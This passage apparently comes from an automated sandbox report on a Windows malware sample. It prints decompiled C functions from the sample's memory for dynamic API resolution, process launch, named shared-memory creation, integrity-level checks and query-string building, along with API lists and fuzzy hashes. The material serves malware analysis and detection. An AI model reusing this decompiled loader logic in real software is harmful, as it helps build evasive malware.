				_t82 =  *0x3c4d1a0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x3c4d1a0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x3c4d1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x3c4d19c; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x3c4d1a0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x3c4d198; // 0x0
										 *_t102 = _t125;
										 *0x3c4d198 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x3c4d19c; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}

0x03c4aca4
0x03c4acba
0x03c4acc0
0x03c4acc2
0x03c4acc7
0x03c4accd
0x03c4acd2
0x03c4acd5
0x03c4ace3
0x03c4acea
0x03c4aced
0x03c4acf0
0x03c4acf1
0x03c4acf4
0x03c4acf7
0x03c4acfa
0x03c4acff
0x03c4ad0e
0x00000000
0x03c4ad14
0x03c4ad1e
0x03c4ad28
0x03c4ad2d
0x03c4ad2f
0x03c4ad39
0x03c4ad3c
0x03c4ad3f
0x03c4ad45
0x03c4ad47
0x03c4ad47
0x03c4ad4a
0x03c4ad4d
0x03c4ad52
0x03c4ad56
0x03c4ad69
0x03c4ad6b
0x03c4ae13
0x03c4ae13
0x03c4ae1a
0x03c4ae1d
0x03c4ae27
0x03c4ae27
0x03c4ae2b
0x03c4aea9
0x03c4aeac
0x03c4aeae
0x03c4aeae
0x03c4aeb5
0x03c4aeb7
0x03c4aec1
0x03c4aec4
0x03c4aec7
0x03c4aec7
0x00000000
0x03c4ae2d
0x03c4ae30
0x03c4ae5e
0x03c4ae68
0x03c4ae6c
0x03c4ae74
0x03c4ae77
0x03c4ae7e
0x03c4ae88
0x03c4ae88
0x03c4ae8c
0x03c4ae91
0x03c4aea0
0x03c4aea6
0x03c4aea6
0x03c4ae8c
0x00000000
0x03c4ae37
0x03c4ae3a
0x03c4ae42
0x03c4ae57
0x03c4ae5c
0x00000000
0x00000000
0x03c4ae5c
0x00000000
0x03c4ae42
0x03c4ae30
0x03c4ae2b
0x03c4ad71
0x03c4ad78
0x03c4ad88
0x03c4ad8b
0x03c4ad91
0x03c4ad95
0x03c4add8
0x03c4ade4
0x03c4ae0d
0x03c4ade6
0x03c4adea
0x03c4adf0
0x03c4adf8
0x03c4adfa
0x03c4adfd
0x03c4ae03
0x03c4ae05
0x03c4ae05
0x03c4adf8
0x03c4adea
0x00000000
0x03c4ade4
0x03c4ad9d
0x03c4ada0
0x03c4ada7
0x03c4adb7
0x03c4adba
0x03c4adca
0x00000000
0x03c4add0
0x03c4adb1
0x03c4adb5
0x00000000
0x00000000
0x00000000
0x03c4adb5
0x03c4ad82
0x03c4ad86
0x00000000
0x00000000
0x00000000
0x03c4ad86
0x03c4ad5f
0x03c4ad63
0x00000000
0x00000000
0x00000000

APIs

RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 03C4AD0E
LoadLibraryA.KERNEL32(?), ref: 03C4AD8B
GetLastError.KERNEL32 ref: 03C4AD97
RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 03C4ADCA

Strings

$, xrefs: 03C4ACE3

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad
String ID: $
API String ID: 948315288-3993045852
Opcode ID: b56a01fccb9ca687f8c2bfe8d8a0f143150cfd1c7b32cca716b6e5141a0cedbc
Instruction ID: 591b540f4b7de6bafb8a7ffe276c8a9e4036c497d345f892c81518baa5fa4f99
Opcode Fuzzy Hash: b56a01fccb9ca687f8c2bfe8d8a0f143150cfd1c7b32cca716b6e5141a0cedbc
Instruction Fuzzy Hash: 00813E79A40205AFDB21DFA9D884BAEB7F5FF48310F148069E915EB340EB70EA55CB50

Uniqueness

Uniqueness Score: -1.00%

Function 004181AF, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

_check_managed_app.LIBCMTD ref: 004181BD

Part of subcall function 0041C320: HeapCreate.KERNEL32(00000000,00001000,00000000,?,?,004181CA), ref: 0041C336

_fast_error_exit.LIBCMTD ref: 004181D0

Part of subcall function 00418320: __FF_MSGBANNER.LIBCMTD ref: 0041832E
Part of subcall function 00418320: __NMSG_WRITE.LIBCMTD ref: 00418337
Part of subcall function 00418320: ___crtExitProcess.LIBCMTD ref: 00418344

_fast_error_exit.LIBCMTD ref: 004181E3
__RTC_Initialize.LIBCMTD ref: 004181F5
__ioinit.LIBCMTD ref: 00418201
___crtGetEnvironmentStringsW.LIBCMTD ref: 0041821F
___wsetargv.LIBCMTD ref: 00418229
__wsetenvp.LIBCMTD ref: 0041823C
__cinit.LIBCMTD ref: 00418251
__wwincmdln.LIBCMTD ref: 0041826E

Strings

VA, xrefs: 004181C5

Memory Dump Source

Source File: 00000000.00000002.509696033.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: ___crt_fast_error_exit$CreateEnvironmentExitHeapInitializeProcessStrings___wsetargv__cinit__ioinit__wsetenvp__wwincmdln_check_managed_app
String ID: VA
API String ID: 4090165920-151723848
Opcode ID: a5b7ca4371df42234e2d029ef0e2289878417a7cff3b469200d3fe0f9d2fa28f
Instruction ID: e821a02d00216869c8f315ad4114bddd8eea13090f7bc620099e32dfcb519081
Opcode Fuzzy Hash: a5b7ca4371df42234e2d029ef0e2289878417a7cff3b469200d3fe0f9d2fa28f
Instruction Fuzzy Hash: CD3177B1D407085AEB10BBF2AD567DE7661AB1470CF14042EF90567282FE799484CA5A

Uniqueness

Uniqueness Score: -1.00%

Function 03C43485, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E03C43485(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E03C44944(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16); // executed
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E03C4A789( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x3c4d260 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x3c4d2a8; // 0xcaa5a8
					_t18 = _t47 + 0x3c4e3e6; // 0x73797325
					_t68 = E03C47912(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x3c4d2a8; // 0xcaa5a8
						_t19 = _t50 + 0x3c4e747; // 0x48f8cef
						_t20 = _t50 + 0x3c4e0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E03C43179();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0); // executed
							_push(1);
							E03C43179();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x3c4d238, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E03C48B22(_t70);
				goto L12;
			}

0x03c4348d
0x03c4348d
0x03c4349c
0x03c434a3
0x03c434a8
0x03c435b5
0x03c435bc
0x03c435bc
0x03c434b7
0x03c434bf
0x03c434c2
0x03c434c7
0x03c434dc
0x03c434e2
0x03c434e3
0x03c434e6
0x03c434ec
0x03c434ef
0x03c434f4
0x03c434fc
0x03c43508
0x03c4350c
0x03c4359c
0x03c43512
0x03c43512
0x03c43517
0x03c4351e
0x03c43532
0x03c43536
0x03c43585
0x03c43538
0x03c43539
0x03c43540
0x03c43559
0x03c4355b
0x03c4355f
0x03c43566
0x03c43580
0x03c43568
0x03c43571
0x03c43576
0x03c43576
0x03c43566
0x03c43594
0x03c43594
0x03c4350c
0x03c435a3
0x03c435ac
0x03c435b0
0x00000000

APIs

Part of subcall function 03C44944: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,03C434A1,?,00000001,?,?,00000000,00000000), ref: 03C44969
Part of subcall function 03C44944: GetProcAddress.KERNEL32(00000000,7243775A), ref: 03C4498B
Part of subcall function 03C44944: GetProcAddress.KERNEL32(00000000,614D775A), ref: 03C449A1
Part of subcall function 03C44944: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 03C449B7
Part of subcall function 03C44944: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 03C449CD
Part of subcall function 03C44944: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 03C449E3

memset.NTDLL ref: 03C434EF

Part of subcall function 03C47912: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,03C43508,73797325), ref: 03C47923
Part of subcall function 03C47912: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 03C4793D

GetModuleHandleA.KERNEL32(4E52454B,048F8CEF,73797325), ref: 03C43525
GetProcAddress.KERNEL32(00000000), ref: 03C4352C
HeapFree.KERNEL32(00000000,00000000), ref: 03C43594

Part of subcall function 03C43179: GetProcAddress.KERNEL32(36776F57,03C48BDC), ref: 03C43194

CloseHandle.KERNEL32(00000000,00000001), ref: 03C43571
CloseHandle.KERNEL32(?), ref: 03C43576
GetLastError.KERNEL32(00000001), ref: 03C4357A

Strings

Ut, xrefs: 03C43594

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
String ID: Ut
API String ID: 3075724336-8415677
Opcode ID: 18b95c9edc62a8a05b3f5d0fbc865df752d846184d640c18916a143ecc2dd3b3
Instruction ID: 53d978fa95e084f1c9e3cb7b2fc9da98858499b4eb5b27a9f1aa6d9cf436cfa7
Opcode Fuzzy Hash: 18b95c9edc62a8a05b3f5d0fbc865df752d846184d640c18916a143ecc2dd3b3
Instruction Fuzzy Hash: A0313FBA900208BFDB21FFA4DC88E9EBBBCEB44214F154565E606E7111D731AE58DB50

Uniqueness

Uniqueness Score: -1.00%

Function 03C48E0D, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E03C48E0D(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L03C4AF68();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x3c4d2a8; // 0xcaa5a8
				_t5 = _t13 + 0x3c4e87e; // 0x48f8e26
				_t6 = _t13 + 0x3c4e59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L03C4AC0A();
				_t17 = CreateFileMappingW(0xffffffff, 0x3c4d2ac, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x03c48e0d
0x03c48e15
0x03c48e19
0x03c48e1f
0x03c48e24
0x03c48e29
0x03c48e2c
0x03c48e2f
0x03c48e34
0x03c48e35
0x03c48e38
0x03c48e3d
0x03c48e44
0x03c48e4e
0x03c48e50
0x03c48e51
0x03c48e54
0x03c48e70
0x03c48e76
0x03c48e7a
0x03c48ec8
0x03c48e7c
0x03c48e89
0x03c48e99
0x03c48ea1
0x03c48eb3
0x03c48eb7
0x00000000
0x00000000
0x03c48ea3
0x03c48ea6
0x03c48eab
0x03c48ead
0x03c48ead
0x03c48e8b
0x03c48e8d
0x03c48eb9
0x03c48eba
0x03c48eba
0x03c48e89
0x03c48ecf

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,03C42FFF,?,?,4D283A53,?,?), ref: 03C48E19
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 03C48E2F
_snwprintf.NTDLL ref: 03C48E54
CreateFileMappingW.KERNELBASE(000000FF,03C4D2AC,00000004,00000000,00001000,?), ref: 03C48E70
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,03C42FFF,?,?,4D283A53), ref: 03C48E82
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 03C48E99
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,03C42FFF,?,?), ref: 03C48EBA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,03C42FFF,?,?,4D283A53), ref: 03C48EC2

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: ad0199697ff1e0b9ace98fd8ad6c383069a46a86b2b5118b998a2fd25f5846e7
Instruction ID: e8dcec8c3a9d0a0a2d0c36843082d63385697d2d2043c1feba3b97548d893cb4
Opcode Fuzzy Hash: ad0199697ff1e0b9ace98fd8ad6c383069a46a86b2b5118b998a2fd25f5846e7
Instruction Fuzzy Hash: DA21E4BAA41304BBD721FFA8CC05F8E77B9AB44710F154120FA05EB2D0D7719A058B91

Uniqueness

Uniqueness Score: -1.00%

Function 03C458DB, Relevance: 12.1, APIs: 8, Instructions: 75
networkCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E03C458DB(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				void* _t37;
				void* _t41;
				intOrPtr* _t45;

				_t41 = __edi;
				_t37 = __ebx;
				_t45 = __eax;
				_t16 =  *((intOrPtr*)(__eax + 0x20));
				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
					E03C429C0(_t16, __ecx, 0xea60);
				}
				_t17 =  *(_t45 + 0x18);
				_push(_t37);
				_push(_t41);
				if(_t17 != 0) {
					InternetSetStatusCallback(_t17, 0);
					InternetCloseHandle( *(_t45 + 0x18)); // executed
				}
				_t18 =  *(_t45 + 0x14);
				if(_t18 != 0) {
					InternetSetStatusCallback(_t18, 0);
					InternetCloseHandle( *(_t45 + 0x14));
				}
				_t19 =  *(_t45 + 0x10);
				if(_t19 != 0) {
					InternetSetStatusCallback(_t19, 0);
					InternetCloseHandle( *(_t45 + 0x10));
				}
				_t20 =  *(_t45 + 0x1c);
				if(_t20 != 0) {
					CloseHandle(_t20);
				}
				_t21 =  *(_t45 + 0x20);
				if(_t21 != 0) {
					CloseHandle(_t21);
				}
				_t22 =  *((intOrPtr*)(_t45 + 8));
				if( *((intOrPtr*)(_t45 + 8)) != 0) {
					E03C48B22(_t22);
					 *((intOrPtr*)(_t45 + 8)) = 0;
					 *((intOrPtr*)(_t45 + 0x30)) = 0;
				}
				_t23 =  *((intOrPtr*)(_t45 + 0xc));
				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
					E03C48B22(_t23);
				}
				_t24 =  *_t45;
				if(_t24 != 0) {
					_t24 = E03C48B22(_t24);
				}
				_t46 =  *((intOrPtr*)(_t45 + 4));
				if( *((intOrPtr*)(_t45 + 4)) != 0) {
					return E03C48B22(_t46);
				}
				return _t24;
			}

0x03c458db
0x03c458db
0x03c458dd
0x03c458df
0x03c458e6
0x03c458ed
0x03c458ed
0x03c458f2
0x03c458f5
0x03c458fc
0x03c45905
0x03c45909
0x03c4590e
0x03c4590e
0x03c45910
0x03c45915
0x03c45919
0x03c4591e
0x03c4591e
0x03c45920
0x03c45925
0x03c45929
0x03c4592e
0x03c4592e
0x03c45930
0x03c4593b
0x03c4593e
0x03c4593e
0x03c45940
0x03c45945
0x03c45948
0x03c45948
0x03c4594a
0x03c45951
0x03c45954
0x03c45959
0x03c4595c
0x03c4595c
0x03c4595f
0x03c45964
0x03c45967
0x03c45967
0x03c4596c
0x03c45970
0x03c45973
0x03c45973
0x03c45978
0x03c4597d
0x00000000
0x03c45980
0x03c45987

APIs

InternetSetStatusCallback.WININET(?,00000000), ref: 03C45909
InternetCloseHandle.WININET(?), ref: 03C4590E
InternetSetStatusCallback.WININET(?,00000000), ref: 03C45919
InternetCloseHandle.WININET(?), ref: 03C4591E
InternetSetStatusCallback.WININET(?,00000000), ref: 03C45929
InternetCloseHandle.WININET(?), ref: 03C4592E
CloseHandle.KERNEL32(?,00000000,00000102,?,?,03C493DC,?,?,00000000,00000000,74E481D0), ref: 03C4593E
CloseHandle.KERNEL32(?,00000000,00000102,?,?,03C493DC,?,?,00000000,00000000,74E481D0), ref: 03C45948

Part of subcall function 03C429C0: WaitForMultipleObjects.KERNEL32(00000002,03C4A923,00000000,03C4A923,?,?,?,03C4A923,0000EA60), ref: 03C429DB

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Internet$CloseHandle$CallbackStatus$MultipleObjectsWait
String ID:
API String ID: 2824497044-0
Opcode ID: 97f9ab66af51f2ea1a53eb42b8bf2d99894c2409ee0da75624ed004d0e39dc60
Instruction ID: 9d984695723db1d8aa2612ce346c5326dcd355130342b9eb82a8990c98f320f8
Opcode Fuzzy Hash: 97f9ab66af51f2ea1a53eb42b8bf2d99894c2409ee0da75624ed004d0e39dc60
Instruction Fuzzy Hash: 6C110D7A6007486BC630EEAAEC84C1BF7E9BF562207994D19E086DB510CB31FD458A60

Uniqueness

Uniqueness Score: -1.00%

Function 03C4A2C6, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03C4A2C6(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x3c4d25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, ?str?,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E03C41525(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E03C48B22(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x03c4a2d3
0x03c4a2da
0x03c4a2e1
0x03c4a2f5
0x03c4a300
0x03c4a318
0x03c4a325
0x03c4a328
0x03c4a32d
0x03c4a338
0x03c4a33c
0x03c4a34b
0x03c4a34f
0x03c4a36b
0x03c4a36b
0x03c4a36f
0x03c4a36f
0x03c4a374
0x03c4a378
0x03c4a37e
0x03c4a37f
0x03c4a386
0x03c4a38c

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 03C4A2F8
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 03C4A318
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 03C4A328
CloseHandle.KERNEL32(00000000), ref: 03C4A378

Part of subcall function 03C41525: RtlAllocateHeap.NTDLL(00000000,00000000,03C41278), ref: 03C41531

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 03C4A34B
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 03C4A353
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 03C4A363

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: a3fe677c394bc5d5933033f7aca6c433504b9bb5c1299a89155e1416fa054965
Instruction ID: 97f58a055b933710368b53149cc6c1f738b0ca0f8f689f63b74faea4aa8606d3
Opcode Fuzzy Hash: a3fe677c394bc5d5933033f7aca6c433504b9bb5c1299a89155e1416fa054965
Instruction Fuzzy Hash: C1213E79900208FFEB10EFA4DC44EEEBBB9EB44314F144065E911E6251D7719E45EF60

Uniqueness

Uniqueness Score: -1.00%

Function 03C47B8D, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E03C47B8D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t24;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x3c4d2a8; // 0xcaa5a8
				_t1 = _t9 + 0x3c4e62c; // 0x253d7325
				_t36 = 0;
				_t28 = E03C4A055(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E03C41525(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E03C41188(_t34, _t41, _a8);
						E03C48B22(_t41);
						_t42 = E03C4976F(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E03C48B22(_t36);
							_t36 = _t42;
						}
						_t24 = E03C4A41C(_t36, _t33); // executed
						_t43 = _t24;
						if(_t43 != 0) {
							E03C48B22(_t36);
							_t36 = _t43;
						}
					}
					E03C48B22(_t28);
				}
				return _t36;
			}

0x03c47b8d
0x03c47b90
0x03c47b91
0x03c47b99
0x03c47ba0
0x03c47ba7
0x03c47bab
0x03c47bb1
0x03c47bb8
0x03c47bbd
0x03c47bcf
0x03c47bd3
0x03c47bd7
0x03c47bdd
0x03c47be2
0x03c47bf2
0x03c47bf4
0x03c47c0b
0x03c47c0f
0x03c47c12
0x03c47c17
0x03c47c17
0x03c47c1b
0x03c47c20
0x03c47c24
0x03c47c27
0x03c47c2c
0x03c47c2c
0x03c47c24
0x03c47c2f
0x03c47c2f
0x03c47c3a

APIs

Part of subcall function 03C4A055: lstrlen.KERNEL32(00000000,00000000,00000000,7691C740,?,?,?,03C47BA7,253D7325,00000000,00000000,7691C740,?,?,03C49DA0,?), ref: 03C4A0BC
Part of subcall function 03C4A055: sprintf.NTDLL ref: 03C4A0DD

lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,03C49DA0,?,048F95B0), ref: 03C47BB8
lstrlen.KERNEL32(?,?,?,03C49DA0,?,048F95B0), ref: 03C47BC0

Part of subcall function 03C41525: RtlAllocateHeap.NTDLL(00000000,00000000,03C41278), ref: 03C41531

strcpy.NTDLL ref: 03C47BD7
lstrcat.KERNEL32(00000000,?), ref: 03C47BE2

Part of subcall function 03C41188: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,03C47BF1,00000000,?,?,?,03C49DA0,?,048F95B0), ref: 03C4119F

Part of subcall function 03C48B22: RtlFreeHeap.NTDLL(00000000,00000000,03C4131A,00000000,?,?,00000000), ref: 03C48B2E

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,03C49DA0,?,048F95B0), ref: 03C47BFF

Part of subcall function 03C4976F: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,03C47C0B,00000000,?,?,03C49DA0,?,048F95B0), ref: 03C49779
Part of subcall function 03C4976F: _snprintf.NTDLL ref: 03C497D7

Strings

=, xrefs: 03C47BF9

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: 09ae8bbf577a0f1bbc8c339818c57978b4dec77824b603dd085f5c7ab1feabd9
Instruction ID: d69af4576e7ed3d5bee1c0586fb96dd03502756fe14a67c5bad59e02eec3d0de
Opcode Fuzzy Hash: 09ae8bbf577a0f1bbc8c339818c57978b4dec77824b603dd085f5c7ab1feabd9
Instruction Fuzzy Hash: BA11C27F9013257B8722FBB49C88CAFBAADDE4856030A4515F914EF200DF35DD02A7A0

Uniqueness

Uniqueness Score: -1.00%

Function 004002F3, Relevance: 10.1, APIs: 6, Instructions: 1084libraryloaderCOMMON

Download Yara Rule

